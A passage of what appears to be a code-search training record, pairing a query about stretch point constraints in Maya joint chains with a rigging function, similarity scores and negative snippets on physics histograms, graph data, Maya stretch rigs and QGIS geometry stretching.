\"_true_events_all.txt\", delimiter=\",\", dtype=data_types)\n\tarr_simu = np.loadtxt(pop_path + bolo_name + \"_simu_events_all.txt\", delimiter=\",\", dtype=data_types)\n\n\tEI_true = 0.5*(arr_true[\"EIB\"]+arr_true[\"EID\"])\n\tEC_true = 0.5*(arr_true[\"EC1\"]+arr_true[\"EC2\"])\n\n\tEI_simu = 0.5*(arr_simu[\"EIB\"]+arr_simu[\"EID\"])\n\tEC_simu = 0.5*(arr_simu[\"EC1\"]+arr_simu[\"EC2\"])\n\n\th2Darr = TH2F(\"h2Darr\", \"h2Darr\", 1000, -2, 15, 1000, -2, 15)\n\th2Dsimu = TH2F(\"h2Dsimu\", \"h2Dsimu\", 1000, -2, 15, 1000, -2, 15)\n\n\tfor i in range(EI_true.shape[0]):\n\t\th2Darr.Fill(EC_true[i], EI_true[i])\n\tfor i in range(EI_simu.shape[0]):\n\t\th2Dsimu.Fill(EC_simu[i],EI_simu[i])\n\n\tPyRPl.process_TH2(h2Darr, X_title = \"EC\", Y_title = \"EI\", color = kRed)\n\tPyRPl.process_TH2(h2Dsimu, X_title = \"EC\", Y_title = \"EI\", color = kBlack)\n\n\th2Darr.Draw()\n\th2Dsimu.Draw(\"same\")\n\n\t#Slices on EC\n\tfor EC in range(2,15):\n\t\tl_true = np.where(np.logical_and(EC_true>EC-1 , EC_true<EC))\n\t\tl_simu = np.where(np.logical_and(EC_simu>EC-1 , EC_simu<EC))\n\n\t\tslice_EI_true = EI_true[l_true]\n\t\tslice_EI_simu = EI_simu[l_simu]\n\n\t\tprint scipy.stats.ks_2samp(slice_EI_true, slice_EI_simu),\" \", 1.36*sqrt(len(slice_EI_true) + len(slice_EI_simu))/sqrt(len(slice_EI_true) * len(slice_EI_simu))\n\n\t\ttrue_cdf = sm.distributions.ECDF(slice_EI_true)\n\t\tsimu_cdf = sm.distributions.ECDF(slice_EI_simu)\n\n\t\tx_true = np.linspace(min(slice_EI_true), max(slice_EI_true))\n\t\tx_simu = np.linspace(min(slice_EI_simu), max(slice_EI_simu))\n\t\ty_true = true_cdf(x_true)\n\t\ty_simu = simu_cdf(x_simu)\n\n\t\tplt.step(x_true, y_true, \"r\", label = \"True IonFid CDF @ EC in [\" + str(EC-1) + \",\" + str(EC) + \"]\" )\n\t\tplt.step(x_simu, y_simu, \"k\", label = \"Simu IonFid CDF @ EC in [\" + str(EC-1) + \",\" + str(EC) + \"]\")\n\t\tplt.legend(loc=\"upper left\", prop={\"size\":10})\n\n\t\tplt.show()\n\t\traw_input()\n\t\tplt.clf()\n\n\t#Slices on EI\n\tfor EI in range(1,15):\n\t\tl_true = np.where(np.logical_and(EI_true>EI-1 , EI_true<EI))\n\t\tl_simu = np.where(np.logical_and(EI_simu>EI-1 , EI_simu<EI))\n\n\t\tslice_EC_true = EC_true[l_true]\n\t\tslice_EC_simu = EC_simu[l_simu]\n\n\t\tprint scipy.stats.ks_2samp(slice_EC_true, slice_EC_simu),\" \", 1.36*sqrt(len(slice_EC_true) + len(slice_EC_simu))/sqrt(len(slice_EC_true) * len(slice_EC_simu))\n\n\t\ttrue_cdf = sm.distributions.ECDF(slice_EC_true)\n\t\tsimu_cdf = sm.distributions.ECDF(slice_EC_simu)\n\n\t\tx_true = np.linspace(min(slice_EC_true), max(slice_EC_true))\n\t\tx_simu = np.linspace(min(slice_EC_simu), max(slice_EC_simu))\n\t\ty_true = true_cdf(x_true)\n\t\ty_simu = simu_cdf(x_simu)\n\n\t\tplt.step(x_true, y_true, \"r\", label = \"True IonFid CDF @ EI in [\" + str(EI-1) + \",\" + str(EI) + \"]\" )\n\t\tplt.step(x_simu, y_simu, \"k\", label = \"Simu IonFid CDF @ EI in [\" + str(EI-1) + \",\" + str(EI) + \"]\")\n\t\tplt.legend(loc=\"upper left\", prop={\"size\":10})\n\n\t\tplt.show()\n\t\traw_input()\n\t\tplt.clf()", "def karate_club(metadata: bool = False) -> Union[sparse.csr_matrix, Bunch]:\n row = np.array(\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,\n 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3,\n 3, 4, 4, 5, 5, 5, 6, 8, 8, 8, 9, 13, 14, 14, 15, 15, 18,\n 18, 19, 20, 20, 22, 22, 23, 23, 23, 23, 23, 24, 24, 24, 25, 26, 26,\n 27, 28, 28, 29, 29, 30, 30, 31, 31, 32])\n col = np.array(\n [1, 2, 3, 4, 5, 6, 7, 8, 10, 11, 12, 13, 17, 19, 21, 31, 2,\n 3, 7, 13, 17, 19, 21, 30, 3, 7, 8, 9, 13, 27, 28, 32, 7, 12,\n 13, 6, 10, 6, 10, 16, 16, 30, 32, 33, 33, 33, 32, 33, 32, 33, 32,\n 33, 33, 32, 33, 32, 33, 25, 27, 29, 32, 33, 25, 27, 31, 31, 29, 33,\n 33, 31, 33, 32, 33, 32, 33, 32, 33, 33])\n adjacency = sparse.csr_matrix((np.ones(len(row), dtype=bool), (row, col)), shape=(34, 34))\n adjacency = sparse.csr_matrix(adjacency + adjacency.T, dtype=bool)\n\n if metadata:\n labels = np.array(\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n x = np.array(\n [0.04, 0.24, 0.01, 0.13, 0.02, -0.08, 0.04, 0.21, 0.08, -0.11, -0.13, -0.28, 0.2, 0.08,\n 0.23, 0.06, -0.06, 0.32, 0.15, 0.19, 0.27, 0.39, -0.04, -0.26, -0.51, -0.49, -0.19, -0.28,\n -0.11, -0.17, 0.22, -0.21, 0.03, 0])\n y = np.array(\n [-0.33, -0.15, -0.01, -0.28, -0.64, -0.75, -0.76, -0.25, 0.09, 0.23, -0.62, -0.4, -0.53, -0.07,\n 0.55, 0.64, -1., -0.42, 0.6, -0.01, 0.45, -0.34, 0.61, 0.41, 0.14, 0.28, 0.68, 0.21,\n 0.12, 0.54, 0.19, 0.09, 0.38, 0.33])\n graph = Bunch()\n graph.adjacency = adjacency\n graph.labels = labels\n graph.position = np.vstack((x, y)).T\n graph.name = 'karate_club'\n return graph\n else:\n return adjacency", "def find_nb(self, ox1, atoms, r1, r2):\n nb_check = [{}, \"\"]\n for k in atoms:\n dox = Vector.length(ox1[1][1] - atoms[k][1])\n if (k != ox1[0] and ox1[1][2] != atoms[k][2] and\n dox <= (r1 + r2)):\n nb_check[0][k] = atoms[k]\n if dox <= r2:\n nb_check[1] = ''.join([nb_check[1], atoms[k][0]])\n return nb_check", "def constraint_B_k_invis(self):\n ms = self.ms\n width_contr = 0.0\n\n # Make sure scalar mass doesn't fall outside of kinematic bounds\n if np.any([s[0] <= ms**2 <= s[1] for s in B_k_invis_obs.s_bounds]):\n widths_s = self.partial_widths()\n width_s = widths_s[\"total\"]\n width_s_sm = width_s - widths_s[\"x x\"] # Gamma_{S->SM}\n\n # Magnitude of S' 3-momentum\n ps = np.sqrt(\n (mB - mk - ms) * (mB + mk - ms) * (mB - mk + ms) * (mB + mk + ms)\n ) / (2.0 * mB)\n # Probability that S decays outside the detector\n pr_invis = np.exp(-B_k_invis_obs.r_max * cm_to_inv_MeV * width_s * ms / ps)\n\n # Compute the total contribution to the invisible decay width\n width_contr = (\n self.width_B_k_s() * (widths_s[\"x x\"] + pr_invis * width_s_sm) / width_s\n )\n\n return B_k_invis_obs.width_bound - width_contr" ]
[ "0.5314263", "0.5311153", "0.5255831", "0.5082965", "0.50570154", "0.4981262", "0.49758726", "0.4932032", "0.49083376", "0.49006724", "0.48869604", "0.4875669", "0.4868179", "0.48634484", "0.48508698", "0.48497802", "0.48386258", "0.4834771", "0.48233885", "0.48123473", "0.4800969", "0.47846892", "0.4779808", "0.4777222", "0.47758475", "0.47743738", "0.47689503", "0.47672373", "0.47251853", "0.4704321", "0.46871138", "0.46726686", "0.46650255", "0.4660924", "0.46592376", "0.46442923", "0.46346065", "0.4634003", "0.46242332", "0.46181834", "0.4612813", "0.4611873", "0.46087605", "0.4605151", "0.45981938", "0.4596615", "0.45931402", "0.45895904", "0.45850706", "0.4581507", "0.45800897", "0.4579808", "0.45776066", "0.45769393", "0.45766032", "0.45730895", "0.45715412", "0.4568879", "0.45599315", "0.45566228", "0.45515606", "0.45510364", "0.45500574", "0.45465508", "0.454163", "0.45384535", "0.45315588", "0.45292556", "0.45273432", "0.45234594", "0.45232823", "0.45210198", "0.45190492", "0.45180315", "0.45167825", "0.45146626", "0.45143732", "0.45106146", "0.45104134", "0.45075592", "0.45075592", "0.45067587", "0.4504495", "0.45030448", "0.45027062", "0.45008263", "0.44980514", "0.44938853", "0.44926026", "0.449229", "0.44912922", "0.44903773", "0.44902602", "0.44869214", "0.4484275", "0.44775712", "0.4474466", "0.4471736", "0.44700104", "0.4468887", "0.4468646" ]
0.0
-1
Create stratch point constraints on a chain of stretch joints.
def stretch_twist_jnts(start_jnt, end_jnt, twist_jnts): div = 1.0 / (len(twist_jnts)+1) for i, joint in enumerate(twist_jnts): weight = div*(i+1) mc.pointConstraint(start_jnt, joint, weight=1.0-weight) mc.pointConstraint(end_jnt, joint, weight=weight)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n obj = qad_utils.whatGeomIs(0, geom)\n if (type(obj) != list and type(obj) != tuple):\n objType = obj.whatIs()\n if objType == \"CIRCLE\": # se é cerchio\n newCircle = gripStretchCircle(obj, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newCircle is not None:\n return QgsGeometry.fromPolyline(newCircle.asPolyline(tolerance2ApproxCurve))\n elif objType == \"ARC\": # se é arco\n newArc = gripStretchArc(obj, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newArc is not None:\n return QgsGeometry.fromPolyline(newArc.asPolyline(tolerance2ApproxCurve))\n return None\n \n linearObjectListToStretch = qad_utils.QadLinearObjectList()\n linearObjectListToStretch.fromPolyline(geom.asPolyline())\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n \n pts = linearObjectListToStretch.asPolyline(tolerance2ApproxCurve)\n stretchedGeom = QgsGeometry.fromPolyline(pts) \n \n return stretchedGeom", "def ar_addStretchSquash():\n setupName = 'Nose'\n sel = cmds.ls(sl=True)\n chain = cmds.ls(sel[0], dag=True, typ='joint')\n IKSpine = cmds.ikHandle(sj=chain[0], ee=chain[len(chain) - 1], sol='ikSplineSolver')\n # rename\n cmds.rename(IKSpine[0], 'IKSplineHandle_' + setupName)\n cmds.rename(IKSpine[1], 'IKSplineEff_' + setupName)\n cmds.rename(IKSpine[2], 'IKSplineCurve_' + setupName)\n # create new joints.\n cmds.select(cl=True)\n bindStartJt = cmds.joint(n='JtCrvBind01')\n cmds.select(cl=True)\n bindEndJt = cmds.joint(n='JtCrvBind02')\n cmds.delete(cmds.parentConstraint(chain[0], bindStartJt))\n cmds.delete(cmds.parentConstraint(chain[len(chain) - 1], bindEndJt))\n\n cmds.skinCluster(bindStartJt, bindEndJt, 'IKSplineCurve_' + setupName, bm=0, sm=0, nw=1, wd=0, mi=2)\n ctlStart = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '01_CTRL', ch=False)\n extraGrp = cmds.createNode('transform', n='Toony' + setupName + '01ExtraGrp')\n offGrp = cmds.createNode('transform', n='Toony' + setupName + '01OffsetGrp')\n cmds.parent(ctlStart[0], extraGrp)\n cmds.parent(extraGrp, offGrp)\n cmds.delete(cmds.parentConstraint(bindStartJt, offGrp))\n # endJOint\n ctlEnd = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '02_CTRL', ch=False)\n extraGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02ExtraGrp')\n offGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02OffsetGrp')\n cmds.parent(ctlEnd[0], extraGrpEnd)\n cmds.parent(extraGrpEnd, offGrpEnd)\n cmds.delete(cmds.parentConstraint(bindEndJt, offGrpEnd))\n # parent constraint wiht bind joints.\n cmds.parentConstraint(ctlStart[0], bindStartJt)\n cmds.parentConstraint(ctlEnd[0], bindEndJt)\n # Create connection with node basis.\n crvInfo = cmds.createNode('curveInfo', n='curveInfo_Toony' + setupName)\n shpCrv = cmds.listRelatives('IKSplineCurve_' + setupName, s=True)\n cmds.connectAttr(shpCrv[0] + '.worldSpace[0]', crvInfo + '.inputCurve', f=True)\n mdnForSX = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleX')\n mdnForPW = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_Power')\n mdnForYZ = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleYZ')\n cmds.setAttr(mdnForSX + '.operation', 2)\n cmds.setAttr(mdnForPW + '.operation', 3)\n cmds.setAttr(mdnForYZ + '.operation', 2)\n # connections.\n cmds.connectAttr(crvInfo + '.arcLength', mdnForSX + '.input1X', f=True)\n cmds.setAttr(mdnForSX + '.input2X', cmds.getAttr(mdnForSX + '.input1X'))\n scaledJoint = chain[:-1]\n for each in scaledJoint:\n cmds.connectAttr(mdnForSX + '.outputX', each + '.sx', f=True)\n # power connections.\n cmds.connectAttr(mdnForSX + '.outputX', mdnForPW + '.input1X', f=True)\n cmds.setAttr(mdnForPW + '.input2X', 0.5)\n cmds.connectAttr(mdnForPW + '.outputX', mdnForYZ + '.input2X', f=True)\n cmds.setAttr(mdnForYZ + '.input1X', 1)\n for each in scaledJoint:\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sy')\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sz')\n # TODO: need to full proof this function.", "def biped_stretch(ik_ctrl,\n ik_last_node,\n pv_ctrl,\n switch_ctrl,\n up_arm_fk_ctrl,\n lo_arm_fk_ctrl,\n wrist_fk_ctrl,\n up_arm_ik_jnt,\n lo_arm_ik_jnt,\n wrist_ik_jnt,\n ik_handle,\n pin_attr_name='pinElbow',\n shift_attr_name='shiftElbow'):\n\n # add all my attrs on ctrls\n mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1)\n\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1)\n\n mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')\n wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx')\n max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx')\n\n lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx'))\n wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx'))\n\n # Get parents for ik handle and root of the parm\n arm_root_grp = utils.get_parent(up_arm_ik_jnt)\n\n # Create distance nodes between base, end, and pv ctrl to get the length of side of the triangle\n root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node)\n root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl)\n pv_to_end_dist = utils.create_distance_reader(pv_ctrl, ik_last_node)\n\n # easy stuff first - create fk stretch nodes\n lo_arm_fk_mdl = mc.createNode('multDoubleLinear')\n wrist_fk_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx'))\n mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx'))\n mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2')\n mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2')\n\n utils.connect_abs(lo_arm_fk_mdl+'.output', lo_arm_fk_ctrl+'_ZERO.tx')\n if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl):\n utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx')\n\n # These arethe final fk stretch outputs to connect to joints\n fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output']\n\n # NOW creates node s for thew elbow pin\n lo_arm_pin_mdl = mc.createNode('multDoubleLinear')\n wrist_pin_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_pin_mdl+'.input1', 1)\n mc.setAttr(wrist_pin_mdl+'.input1', 1)\n\n if lo_init_length < 0.0:\n mc.setAttr(lo_arm_pin_mdl+'.input1', -1)\n\n if wrist_init_length < 0.0:\n mc.setAttr(wrist_pin_mdl+'.input1', -1)\n\n mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2')\n mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2')\n\n # These arethe final elbow pin stretch outputs to connect to joints\n pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output']\n\n # create shift nodes\n mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1)\n mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1)\n\n tt = 'linear'\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt)\n\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt)\n\n shift_final_output = [ lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength']\n\n # Create ik indivisual stretch nodes\n lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear')\n wrist_ik_scale_mdl = mc.createNode('multDoubleLinear')\n\n mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1')\n mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1')\n mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2')\n mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2')\n\n # This is the final output for scale and shift\n ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output']\n\n # Now create the IK auto stretch nodes\n lo_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n\n mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1)\n\n adl = mc.createNode('addDoubleLinear')\n mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1')\n mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2')\n utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'):\n\n # compensate feed in new chain length for soft ik chain length\n utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto s tretch or pin mode\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1')\n utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2')\n mc.connectAttr(mdl+'.output', pc+'.w0')\n utils.connect_reverse(pc+'.w0', pc+'.w1')\n\n ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output']\n\n # now create all my blends\n\n # first blend btween FK and an empty ik input\n # (this ikl input will take another blend node for blending oall the IK options )\n fk_to_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender')\n mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R')\n mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G')\n\n # now create a blender between pin elbow and the rest of the ik options\n auto_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender')\n mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R')\n mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R')\n mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G')\n\n # now create a blender between pin elbow and the rest of the ik options\n pin_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender')\n mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R')\n mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R')\n mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G')\n\n # now connect the shift and scale\n mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R')\n mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G')\n\n # now for the magic! Connect the blend networll to joints\n mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx')\n mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')", "def gripStretchQgsGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n wkbType = geom.wkbType()\n if wkbType == QGis.WKBPoint or wkbType == QGis.WKBPoint25D:\n pt = stretchPoint(geom.asPoint(), ptListToStretch, offSetX, offSetY)\n if pt is not None:\n return QgsGeometry.fromPoint(pt)\n \n if wkbType == QGis.WKBMultiPoint:\n stretchedGeom = QgsGeometry(geom)\n points = stretchedGeom.asMultiPoint() # vettore di punti\n atSubGeom = 0\n for pt in points:\n subGeom = QgsGeometry.fromPoint(pt)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n\n if wkbType == QGis.WKBLineString:\n return gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n \n if wkbType == QGis.WKBMultiLineString:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asMultiPolyline() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = 